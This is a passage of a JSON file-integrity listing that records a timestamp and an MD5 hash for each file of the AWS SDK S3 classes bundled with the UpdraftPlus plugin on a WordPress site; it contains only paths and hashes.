:{\"d\":1545638163,\"h\":\"04fb8e74ecc189e6b0436e1260dce9c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/IncorrectNumberOfFilesInPostRequestException.php\":{\"d\":1545638163,\"h\":\"9a7794f2028a7bbecb37f02a291f6c13\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/CrossLocationLoggingProhibitedException.php\":{\"d\":1545638163,\"h\":\"6604c9fc43cc2fcbbf5e20c22edb6026\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoSuchWebsiteConfigurationException.php\":{\"d\":1545638163,\"h\":\"18d8abb944dede950e933b4c8fb4c45d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MalformedPOSTRequestException.php\":{\"d\":1545638163,\"h\":\"6aa99b0de24f2eb1a9de7df2715e38f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/OperationAbortedException.php\":{\"d\":1545638163,\"h\":\"a52b194d60900563f77d9deadbce14ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/PreconditionFailedException.php\":{\"d\":1545638163,\"h\":\"8f04f2096229d8e4c99039e2f8685de5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidAccessKeyIdException.php\":{\"d\":1545638163,\"h\":\"32f96f069dba33c77642bddfffe8db8b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/RedirectException.php\":{\"d\":1545638163,\"h\":\"bcc61525ec8286557cc882e620e0449b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InternalErrorException.php\":{\"d\":1545638163,\"h\":\"af766935b9509e930d0ae19802289e4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidAddressingHeaderException.php\":{\"d\":1545638163,\"h\":\"e8951816cc56a7230167d73186c0ab90\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/ServiceUnavailableException.php\":{\"d\":1545638163,\"h\":\"054e5b096daaad03ee7c920660fbf32c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidPartException.php\":{\"d\":1545638163,\"h\":\"cf7972454e18711007a3282ab14b0b2e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/UnexpectedContentException.php\":{\"d\":1545638163,\"h\":\"5a7af7f0861aec70975e22383edf1605\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/BucketAlreadyExistsException.php\":{\"d\":1545638163,\"h\":\"c70ca0f46a271fbb3a0dd8634778b241\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/EntityTooLargeException.php\":{\"d\":1545638163,\"h\":\"a363b75b6140aa59516d6958bd818487\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidBucketStateException.php\":{\"d\":1545638163,\"h\":\"9010cee7e70cd31d533d490a0f676b7c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MethodNotAllowedException.php\":{\"d\":1545638163,\"h\":\"1bca38cffcc6eb5eb5245f5a89007381\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoSuchUploadException.php\":{\"d\":1545638163,\"h\":\"de7d7276e8357e59053247069af4b17c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/KeyTooLongException.php\":{\"d\":1545638163,\"h\":\"aeb54c82dfc9fa87084948e2e1010d96\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoSuchTagSetException.php\":{\"d\":1545638163,\"h\":\"87a668a2c3678f96ec74498dcab32a96\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NotSuchBucketPolicyException.php\":{\"d\":1545638163,\"h\":\"714b2ba8c970dac2950314acccb4951e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/SlowDownException.php\":{\"d\":1545638163,\"h\":\"2cab1602b76a19567c65bfcdbbd26b66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/ExpiredTokenException.php\":{\"d\":1545638163,\"h\":\"9fde3c8c1f8ce13d3c1459ba80888484\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoSuchCORSConfigurationException.php\":{\"d\":1545638163,\"h\":\"78aa44073391f74bfd34303266c8959b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/AmbiguousGrantByEmailAddressException.php\":{\"d\":1545638163,\"h\":\"b7055c317e07c03c66bdadd3cd6f2fee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/IllegalVersioningConfigurationException.php\":{\"d\":1545638163,\"h\":\"7502affc30c08ec7dec2ca9b79623861\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidPayerException.php\":{\"d\":1545638163,\"h\":\"668af3f62f403e4dff00bcf4c547586d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidTagErrorException.php\":{\"d\":1545638163,\"h\":\"28b72289665d68843022d1b8278afe4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/UserKeyMustBeSpecifiedException.php\":{\"d\":1545638163,\"h\":\"b670411122d9f08bc7a3cb7ca3ba07e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/AccountProblemException.php\":{\"d\":1545638163,\"h\":\"4e04036a4f99661d3d24ba013d26c69a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidArgumentException.php\":{\"d\":1545638163,\"h\":\"26a64d61b80ab87cd4da2f0959951859\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidSOAPRequestException.php\":{\"d\":1545638163,\"h\":\"07f4d5593c6119ab815a5abfafd45b4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/RequestTimeoutException.php\":{\"d\":1545638163,\"h\":\"33862ef527aedb321a40c555d0d81250\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MissingSecurityHeaderException.php\":{\"d\":1545638163,\"h\":\"aea750e7eebe1dfc9e487c789a6a9459\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoSuchBucketPolicyException.php\":{\"d\":1545638163,\"h\":\"5077fdc0b6cd80437ef07d3f35fd70fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MalformedACLErrorException.php\":{\"d\":1545638163,\"h\":\"f6373149be4c19ccb7b614f3a3628ad7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidDigestException.php\":{\"d\":1545638163,\"h\":\"498ad6eea22c072303d33040e1e2fb8a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/RequestTorrentOfBucketErrorException.php\":{\"d\":1545638163,\"h\":\"b7cf62f982b95dd160f44ea6553724d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/AccessDeniedException.php\":{\"d\":1545638163,\"h\":\"c114efca1dcf9a7e3344fa406db0d494\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoSuchLifecycleConfigurationException.php\":{\"d\":1545638163,\"h\":\"27e721bae72c4019ae6d2194a6572ba5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoSuchBucketException.php\":{\"d\":1545638163,\"h\":\"67678971e88adba7f2f48d63cc95adf3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/DeleteMultipleObjectsException.php\":{\"d\":1545638163,\"h\":\"08d0fa5ebbc445faddabca975a979884\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidRangeException.php\":{\"d\":1545638163,\"h\":\"98cfd5cd3599cea086cc16fa50447132\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MetadataTooLargeException.php\":{\"d\":1545638163,\"h\":\"49cef4705a18558a98a461da746f6d07\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/SignatureDoesNotMatchException.php\":{\"d\":1545638163,\"h\":\"20791b3cbe22c91750cfae0c45e345d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/BadDigestException.php\":{\"d\":1545638163,\"h\":\"7ce5a3538bd37d2d893a5a4641ca5e87\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MissingSecurityElementException.php\":{\"d\":1545638163,\"h\":\"d4fda63c036e22004452d73ed1e464d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidURIException.php\":{\"d\":1545638163,\"h\":\"cc39ea5c4ca166c4789366041d2c6647\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidBucketNameException.php\":{\"d\":1545638163,\"h\":\"389ba9774c6752da399d5a06714ca70d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/PermanentRedirectException.php\":{\"d\":1545638163,\"h\":\"61c2464e91a1b3313ccb9dde9d6ea207\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/EntityTooSmallException.php\":{\"d\":1545638163,\"h\":\"8244c7d196fcf6cfe81ce6be4e4ee3c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoSuchKeyException.php\":{\"d\":1545638163,\"h\":\"79da9b57a5ebe3cac8d7d2b0f43fdfab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/UnresolvableGrantByEmailAddressException.php\":{\"d\":1545638163,\"h\":\"ddacbd4d1ee7341fba322be7acda04b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MalformedXMLException.php\":{\"d\":1545638163,\"h\":\"ef3fe78d3ed3db0db2ec67a04ad5a1a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidStorageClassException.php\":{\"d\":1545638163,\"h\":\"deeb571087b1013016717869ab219938\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoSuchTagSetErrorException.php\":{\"d\":1545638163,\"h\":\"6b5056bd3f4a4c5113b16585e7328b90\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MaxPostPreDataLengthExceededErrorException.php\":{\"d\":1545638163,\"h\":\"c0d03c2fc6dd1d30cb53753ff3e76533\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MissingRequestBodyErrorException.php\":{\"d\":1545638163,\"h\":\"402ba71db04643214cb40a1bd7d049ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MissingContentLengthException.php\":{\"d\":1545638163,\"h\":\"84bdb0a39275eb219deb1a2f75c391e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/BucketAlreadyOwnedByYouException.php\":{\"d\":1545638163,\"h\":\"03ddf3e40d02c69d98e31a1ba0e11350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/BucketNotEmptyException.php\":{\"d\":1545638163,\"h\":\"c4164313e71b86ec0a94469ae59f5c7c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InlineDataTooLargeException.php\":{\"d\":1545638163,\"h\":\"16a05c43ee339551a41d6db30b3ca660\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/RequestTimeTooSkewedException.php\":{\"d\":1545638163,\"h\":\"87f1822b747922a3dd576f4da63f1fc1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidLocationConstraintException.php\":{\"d\":1545638163,\"h\":\"649bb9f9299de94c32142afe6966e3bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Command\\/S3Command.php\":{\"d\":1545638163,\"h\":\"3dc05e397450a4b71a982327a206c38c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Iterator\\/OpendirIterator.php\":{\"d\":1545638163,\"h\":\"1a8fc303bcfda2405023bc9ed07fc532\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Iterator\\/ListBucketsIterator.php\":{\"d\":1545638163,\"h\":\"f9c6dcc72963c40346bae45f25a39dd1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Iterator\\/ListObjectVersionsIterator.php\":{\"d\":1545638163,\"h\":\"f05cf3b2a73eff79ed325dc18f91a8b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Iterator\\/ListObjectsIterator.php\":{\"d\":1545638163,\"h\":\"0ee82969d170a64ace65fbbc06ba8a2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Iterator\\/ListMultipartUploadsIterator.php\":{\"d\":1545638163,\"h\":\"ad8bc7cfcb905bbcee5ac63f0d1a248a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Sync\\/KeyConverter.php\":{\"d\":1545638163,\"h\":\"82accba85c2eb6ff5a64094812c507a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Sync\\/UploadSyncBuilder.php\":{\"d\":1545638163,\"h\":\"fe0354dcb7c3a822290c9f21c11669e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Sync\\/ChangedFilesIterator.php\":{\"d\":1545638163,\"h\":\"ae92607d9ceddd5674505361a8707723\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Sync\\/UploadSync.php\":{\"d\":1545638163,\"h\":\"c82772efc07aa48d2b32e4bba547ac06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Sync\\/FilenameConverterInterface.php\":{\"d\":1545638163,\"h\":\"e1367db996b4bf594e6d05871be1147d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Sync\\/AbstractSync.php\":{\"d\":1545638163,\"h\":\"cf937c67b37e8324b092f0e0d4dcf2b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Sync\\/DownloadSyncBuilder.php\":{\"d\":1545638163,\"h\":\"4431c83c1ca49780bc489404c02da65a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Sync\\/AbstractSyncBuilder.php\":{\"d\":1545638163,\"h\":\"6d15b7ff5585bb0b8afa8b9882e59e7b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Sync\\/DownloadSync.php\":{\"d\":1545638163,\"h\":\"c5f5902b0f3efa03abaedcdf5a8b51ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/MultipartUpload\\/UploadBuilder.php\":{\"d\":1545638163,\"h\":\"042169a77d1df6b29ad8b75d8707e1ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/MultipartUpload\\/AbstractTransfer.php\":{\"d\":1545638163,\"h\":\"2990bfe532b2a837406e0a4847dc3b8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/MultipartUpload\\/ParallelTransfer.php\":{\"d\":1545638163,\"h\":\"b94189665c7f24d81fd065703550fb3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/MultipartUpload\\/UploadPart.php\":{\"d\":1545638163,\"h\":\"e52983d0299b0dddcf62ac3fe2a7eff0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/MultipartUpload\\/SerialTransfer.php\":{\"d\":1545638163,\"h\":\"027004eda09ff1954e1833040df9b869\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/MultipartUpload\\/UploadId.php\":{\"d\":1545638163,\"h\":\"0925b992d88491867fe204bb216c9961\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/MultipartUpload\\/TransferState.php\":{\"d\":1545638163,\"h\":\"45484c7268141212c6a346ee5ff05962\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/DeleteObjectsTransfer.php\":{\"d\":1545638163,\"h\":\"8442fbd945058c8ce270abe2a3db63c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/PostObject.php\":{\"d\":1545638163,\"h\":\"66c17323a34783f638c1fd81e619a45e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/Acp.php\":{\"d\":1545638163,\"h\":\"993d7535468f8eec4ae4f82f2bc4d244\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/Grantee.php\":{\"d\":1545638163,\"h\":\"6be236f5723bd6489e97c070056ad4aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/AcpBuilder.php\":{\"d\":1545638163,\"h\":\"087c08ae99813dcdcd22126028721891\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/DeleteObjectsBatch.php\":{\"d\":1545638163,\"h\":\"df249d6cd2cc85213898d5f09c21b1e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/ClearBucket.php\":{\"d\":1545638163,\"h\":\"5211fd4af3eabebdbc15aab48f7200bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Model\\/Grant.php\":{\"d\":1545638163,\"h\":\"9c50fd6b72cb5ce202ffb8aa91dc9ae3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Resources\\/s3-2006-03-01.php\":{\"d\":1545638163,\"h\":\"a4eb71497b8700288d3016544d22a626\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/Status.php\":{\"d\":1545638163,\"h\":\"918d94f3d16f77cac2276b85071e8e93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Enum\\/CannedAcl.php\":{\"d\":1545638163,\"h\":\"f3b4032cea7c631b5cb1cc7947474fb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/